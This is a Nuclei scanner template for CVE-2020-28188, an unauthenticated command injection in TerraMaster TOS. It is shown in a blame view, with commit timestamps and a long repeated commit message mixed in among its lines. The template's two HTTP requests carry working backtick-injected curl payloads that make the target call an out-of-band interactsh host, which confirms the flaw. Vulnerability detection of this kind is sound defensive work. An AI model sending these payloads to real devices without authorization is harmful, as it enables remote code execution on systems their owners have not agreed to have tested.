nuclei-templates/http/cves/2020/CVE-2020-28188.yaml

54 lines
2.1 KiB
YAML
Raw Normal View History

id: CVE-2020-28188
info:
name: TerraMaster TOS - Unauthenticated Remote Command Execution
author: gy741
severity: critical
description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the latest security patch or update provided by TerraMaster to fix the vulnerability.
reference:
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
2021-07-19 11:11:12 +00:00
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
Dashboard Content Enhancements (#3998) * Enhancement: dns/ec2-detection.yaml by mp * Add CVSS/CWE * Trailing space * Linting error on comment indentation * Typo * Enhancement: dns/elasticbeantalk-takeover.yaml by mp * Enhancement: cves/2020/CVE-2020-23517.yaml by mp * Enhancement: dns/elasticbeantalk-takeover.yaml by mp * Enhancement: dns/mx-fingerprint.yaml by mp * Enhancement: dns/mx-service-detector.yaml by mp * Enhancement: dns/nameserver-fingerprint.yaml by mp * Enhancement: dns/ptr-fingerprint.yaml by mp * Enhancement: dns/servfail-refused-hosts.yaml by mp * Enhancement: dns/spoofable-spf-records-ptr.yaml by mp * Enhancement: dns/txt-fingerprint.yaml by mp * Enhancement: dns/worksites-detection.yaml by mp * Enhancement: exposed-panels/3g-wireless-gateway.yaml by mp * Enhancement: exposed-panels/acemanager-login.yaml by mp * Enhancement: exposed-panels/acrolinx-dashboard.yaml by mp * Enhancement: dns/mx-fingerprint.yaml by mp * Enhancement: dns/mx-service-detector.yaml by mp * Enhancement: dns/ptr-fingerprint.yaml by mp * Enhancement: dns/servfail-refused-hosts.yaml by mp * Enhancement: dns/spoofable-spf-records-ptr.yaml by mp * Enhancement: cves/2021/CVE-2021-39501.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-40539.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: cves/2021/CVE-2021-40856.yaml by mp * Enhancement: cves/2021/CVE-2021-40859.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-40539.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/akamai-cloudtest.yaml by mp * Enhancement: exposed-panels/alfresco-detect.yaml by mp * Enhancement: exposed-panels/alienvault-usm.yaml by mp * Enhancement: exposed-panels/ambari-exposure.yaml by mp * Enhancement: exposed-panels/amcrest-login.yaml by mp * Enhancement: exposed-panels/ametys-admin-login.yaml by mp * Enhancement: exposed-panels/ametys-admin-login.yaml by mp * Enhancement: exposed-panels/alienvault-usm.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/ambari-exposure.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-17369.yaml by mp * Enhancement: exposed-panels/apache/public-tomcat-manager.yaml by mp * Enhancement: exposed-panels/apache/apache-apisix-panel.yaml by mp * Enhancement: exposed-panels/ansible-tower-exposure.yaml by mp * Enhancement: exposed-panels/ampps-panel.yaml by mp * Enhancement: exposed-panels/ampps-admin-panel.yaml by mp * Enhancement: exposed-panels/ametys-admin-login.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Fix encoded chars * trailing space * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: exposed-panels/apache/tomcat-pathnormalization.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: exposed-panels/apiman-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-panel.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-rest-api.yaml by mp * Enhancement: exposed-panels/argocd-login.yaml by mp * Enhancement: exposed-panels/atlassian-crowd-panel.yaml by mp * Enhancement: exposed-panels/atvise-login.yaml by mp * Enhancement: exposed-panels/avantfax-panel.yaml by mp * Enhancement: exposed-panels/avatier-password-management.yaml by mp * Enhancement: exposed-panels/axigen-webadmin.yaml by mp * Enhancement: exposed-panels/axigen-webmail.yaml by mp * Enhancement: exposed-panels/azkaban-web-client.yaml by mp * Enhancement: exposed-panels/acunetix-panel.yaml by mp * Enhancement: exposed-panels/adiscon-loganalyzer.yaml by mp * Enhancement: exposed-panels/adminer-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: exposed-panels/adminset-panel.yaml by mp * Enhancement: exposed-panels/adobe/adobe-component-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-connect-central-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-experience-manager-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-media-server.yaml by mp * Enhancement: exposed-panels/advance-setup.yaml by mp * Enhancement: exposed-panels/aerohive-netconfig-ui.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * spacing issues * Spacing * HTML codes improperly interpreted Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Enhancement: technologies/waf-detect.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: network/exposed-adb.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml by mp * Enhancement: exposures/tokens/digitalocean/tugboat-config-exposure.yaml by mp * Enhancement: exposed-panels/concrete5/concrete5-install.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml by mp * indentation issue * Character encoding issue fix * Enhancement: default-logins/alibaba/canal-default-login.yaml by mp * Enhancement: default-logins/alphaweb/alphaweb-default-login.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Enhancement: default-logins/apache/airflow-default-login.yaml by mp * Enhancement: default-logins/apache/apisix-default-login.yaml by mp * Enhancement: default-logins/apollo/apollo-default-login.yaml by mp * Enhancement: default-logins/arl/arl-default-login.yaml by mp * Enhancement: default-logins/digitalrebar/digitalrebar-default-login.yaml by mp * Enhancement: default-logins/mantisbt/mantisbt-default-credential.yaml by mp * Enhancement: default-logins/stackstorm/stackstorm-default-login.yaml by mp * Enhancement: dns/caa-fingerprint.yaml by mp * Enhancement: exposed-panels/active-admin-exposure.yaml by mp * Enhancement: exposed-panels/activemq-panel.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Restore & stomped by dashboard * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2021/CVE-2021-38751.yaml by mp * Enhancement: cves/2021/CVE-2021-39320.yaml by mp * Enhancement: cves/2021/CVE-2021-39322.yaml by mp * Enhancement: cves/2021/CVE-2021-39327.yaml by mp * Enhancement: cves/2021/CVE-2021-39350.yaml by mp * Enhancement: cves/2021/CVE-2021-39433.yaml by mp * Enhancement: cves/2021/CVE-2021-41192.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15824.yaml by mp * Enhancement: exposed-panels/ansible-semaphore-panel.yaml by mp * Enhancement: exposed-panels/aviatrix-panel.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Enhancement: exposed-panels/blue-iris-login.yaml by mp * Enhancement: exposed-panels/bigbluebutton-login.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Spacing issues Add cve-id field * fix & stomping * Enhancement: cves/2016/CVE-2016-1000141.yaml by mp * Enhancement: cves/2020/CVE-2020-24912.yaml by mp * Enhancement: cves/2021/CVE-2021-35265.yaml by mp * Enhancement: cves/2022/CVE-2022-0437.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: technologies/teradici-pcoip.yaml by mp * Enhancement: vulnerabilities/other/unauth-hoteldruid-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: exposed-panels/epson-web-control-detect.yaml by mp * Enhancement: exposed-panels/epson-access-detect.yaml by mp * Enhancement: cves/2020/CVE-2020-29453.yaml by mp * Fix spacing * Remove empty cve lines and relocate tags * Remove blank cve lines & move tags * Fix merge errors * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-2551.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Syntax cleanup * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Syntax and a title change * Enhancement: cves/2021/CVE-2021-38702.yaml by mp * Fix references * Enhancement: cves/2021/CVE-2021-38704.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-44529.yaml by mp * Conflicts resolved * Fix quoting * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-23779.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/cobbler/hue-default-credential.yaml by mp * Enhancement: default-logins/emqx/emqx-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-14536.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Update CVE-2020-25223.yaml * Update CVE-2020-26214.yaml * Update CVE-2020-25506.yaml * Update CVE-2020-2551.yaml * Update CVE-2020-26919.yaml * Update CVE-2021-44529.yaml * Update CVE-2020-28871.yaml * Update CVE-2020-28188.yaml * Update CVE-2021-45967.yaml * Update hue-default-credential.yaml * Update CVE-2021-44529.yaml * misc syntax update Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-03-29 10:33:49 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-28188
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28188
cwe-id: CWE-78
2023-10-14 11:27:55 +00:00
epss-score: 0.9724
epss-percentile: 0.99781
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: terra-master
product: tos
2023-07-12 11:56:50 +00:00
tags: packetstorm,cve,cve2020,terramaster,rce,oast,mirai,unauth
2023-03-29 11:07:38 +00:00
variables:
2023-03-29 14:11:27 +00:00
useragent: '{{rand_base(6)}}'
2023-03-29 11:07:38 +00:00
http:
- raw:
- |
2023-03-29 13:54:19 +00:00
GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
Host: {{Hostname}}
- |
2023-03-29 13:54:19 +00:00
GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
Host: {{Hostname}}
2023-03-29 10:01:08 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2023-03-29 10:01:08 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
Dashboard Content Enhancements (#3998) * Enhancement: dns/ec2-detection.yaml by mp * Add CVSS/CWE * Trailing space * Linting error on comment indentation * Typo * Enhancement: dns/elasticbeantalk-takeover.yaml by mp * Enhancement: cves/2020/CVE-2020-23517.yaml by mp * Enhancement: dns/elasticbeantalk-takeover.yaml by mp * Enhancement: dns/mx-fingerprint.yaml by mp * Enhancement: dns/mx-service-detector.yaml by mp * Enhancement: dns/nameserver-fingerprint.yaml by mp * Enhancement: dns/ptr-fingerprint.yaml by mp * Enhancement: dns/servfail-refused-hosts.yaml by mp * Enhancement: dns/spoofable-spf-records-ptr.yaml by mp * Enhancement: dns/txt-fingerprint.yaml by mp * Enhancement: dns/worksites-detection.yaml by mp * Enhancement: exposed-panels/3g-wireless-gateway.yaml by mp * Enhancement: exposed-panels/acemanager-login.yaml by mp * Enhancement: exposed-panels/acrolinx-dashboard.yaml by mp * Enhancement: dns/mx-fingerprint.yaml by mp * Enhancement: dns/mx-service-detector.yaml by mp * Enhancement: dns/ptr-fingerprint.yaml by mp * Enhancement: dns/servfail-refused-hosts.yaml by mp * Enhancement: dns/spoofable-spf-records-ptr.yaml by mp * Enhancement: cves/2021/CVE-2021-39501.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-40539.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: cves/2021/CVE-2021-40856.yaml by mp * Enhancement: cves/2021/CVE-2021-40859.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-40539.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/akamai-cloudtest.yaml by mp * Enhancement: exposed-panels/alfresco-detect.yaml by mp * Enhancement: exposed-panels/alienvault-usm.yaml by mp * Enhancement: exposed-panels/ambari-exposure.yaml by mp * Enhancement: exposed-panels/amcrest-login.yaml by mp * Enhancement: exposed-panels/ametys-admin-login.yaml by mp * Enhancement: exposed-panels/ametys-admin-login.yaml by mp * Enhancement: exposed-panels/alienvault-usm.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/ambari-exposure.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-17369.yaml by mp * Enhancement: exposed-panels/apache/public-tomcat-manager.yaml by mp * Enhancement: exposed-panels/apache/apache-apisix-panel.yaml by mp * Enhancement: exposed-panels/ansible-tower-exposure.yaml by mp * Enhancement: exposed-panels/ampps-panel.yaml by mp * Enhancement: exposed-panels/ampps-admin-panel.yaml by mp * Enhancement: exposed-panels/ametys-admin-login.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Fix encoded chars * trailing space * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: exposed-panels/apache/tomcat-pathnormalization.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: exposed-panels/apiman-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-panel.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-rest-api.yaml by mp * Enhancement: exposed-panels/argocd-login.yaml by mp * Enhancement: exposed-panels/atlassian-crowd-panel.yaml by mp * Enhancement: exposed-panels/atvise-login.yaml by mp * Enhancement: exposed-panels/avantfax-panel.yaml by mp * Enhancement: exposed-panels/avatier-password-management.yaml by mp * Enhancement: exposed-panels/axigen-webadmin.yaml by mp * Enhancement: exposed-panels/axigen-webmail.yaml by mp * Enhancement: exposed-panels/azkaban-web-client.yaml by mp * Enhancement: exposed-panels/acunetix-panel.yaml by mp * Enhancement: exposed-panels/adiscon-loganalyzer.yaml by mp * Enhancement: exposed-panels/adminer-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: exposed-panels/adminset-panel.yaml by mp * Enhancement: exposed-panels/adobe/adobe-component-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-connect-central-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-experience-manager-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-media-server.yaml by mp * Enhancement: exposed-panels/advance-setup.yaml by mp * Enhancement: exposed-panels/aerohive-netconfig-ui.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * spacing issues * Spacing * HTML codes improperly interpreted Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Enhancement: technologies/waf-detect.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: network/exposed-adb.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml by mp * Enhancement: exposures/tokens/digitalocean/tugboat-config-exposure.yaml by mp * Enhancement: exposed-panels/concrete5/concrete5-install.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml by mp * indentation issue * Character encoding issue fix * Enhancement: default-logins/alibaba/canal-default-login.yaml by mp * Enhancement: default-logins/alphaweb/alphaweb-default-login.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Enhancement: default-logins/apache/airflow-default-login.yaml by mp * Enhancement: default-logins/apache/apisix-default-login.yaml by mp * Enhancement: default-logins/apollo/apollo-default-login.yaml by mp * Enhancement: default-logins/arl/arl-default-login.yaml by mp * Enhancement: default-logins/digitalrebar/digitalrebar-default-login.yaml by mp * Enhancement: default-logins/mantisbt/mantisbt-default-credential.yaml by mp * Enhancement: default-logins/stackstorm/stackstorm-default-login.yaml by mp * Enhancement: dns/caa-fingerprint.yaml by mp * Enhancement: exposed-panels/active-admin-exposure.yaml by mp * Enhancement: exposed-panels/activemq-panel.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Restore & stomped by dashboard * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2021/CVE-2021-38751.yaml by mp * Enhancement: cves/2021/CVE-2021-39320.yaml by mp * Enhancement: cves/2021/CVE-2021-39322.yaml by mp * Enhancement: cves/2021/CVE-2021-39327.yaml by mp * Enhancement: cves/2021/CVE-2021-39350.yaml by mp * Enhancement: cves/2021/CVE-2021-39433.yaml by mp * Enhancement: cves/2021/CVE-2021-41192.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15824.yaml by mp * Enhancement: exposed-panels/ansible-semaphore-panel.yaml by mp * Enhancement: exposed-panels/aviatrix-panel.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Enhancement: exposed-panels/blue-iris-login.yaml by mp * Enhancement: exposed-panels/bigbluebutton-login.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Spacing issues Add cve-id field * fix & stomping * Enhancement: cves/2016/CVE-2016-1000141.yaml by mp * Enhancement: cves/2020/CVE-2020-24912.yaml by mp * Enhancement: cves/2021/CVE-2021-35265.yaml by mp * Enhancement: cves/2022/CVE-2022-0437.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: technologies/teradici-pcoip.yaml by mp * Enhancement: vulnerabilities/other/unauth-hoteldruid-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: exposed-panels/epson-web-control-detect.yaml by mp * Enhancement: exposed-panels/epson-access-detect.yaml by mp * Enhancement: cves/2020/CVE-2020-29453.yaml by mp * Fix spacing * Remove empty cve lines and relocate tags * Remove blank cve lines & move tags * Fix merge errors * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-2551.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Syntax cleanup * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Syntax and a title change * Enhancement: cves/2021/CVE-2021-38702.yaml by mp * Fix references * Enhancement: cves/2021/CVE-2021-38704.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-44529.yaml by mp * Conflicts resolved * Fix quoting * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-23779.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/cobbler/hue-default-credential.yaml by mp * Enhancement: default-logins/emqx/emqx-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-14536.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Update CVE-2020-25223.yaml * Update CVE-2020-26214.yaml * Update CVE-2020-25506.yaml * Update CVE-2020-2551.yaml * Update CVE-2020-26919.yaml * Update CVE-2021-44529.yaml * Update CVE-2020-28871.yaml * Update CVE-2020-28188.yaml * Update CVE-2021-45967.yaml * Update hue-default-credential.yaml * Update CVE-2021-44529.yaml * misc syntax update Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-03-29 10:33:49 +00:00
2023-03-29 10:01:08 +00:00
- type: word
part: interactsh_request
words:
2023-03-29 13:54:19 +00:00
- "User-Agent: {{useragent}}"
# digest: 490a0046304402205a51d30ca205541eada3109ed21ac8f1274b336d562d95a686dd6a9dcb0cd4f002204b342be47cb84a2492d31291da5913518cf12da13a061cab8417cb3cef5c97b6:922c64590222798bb761d5b6d8e72950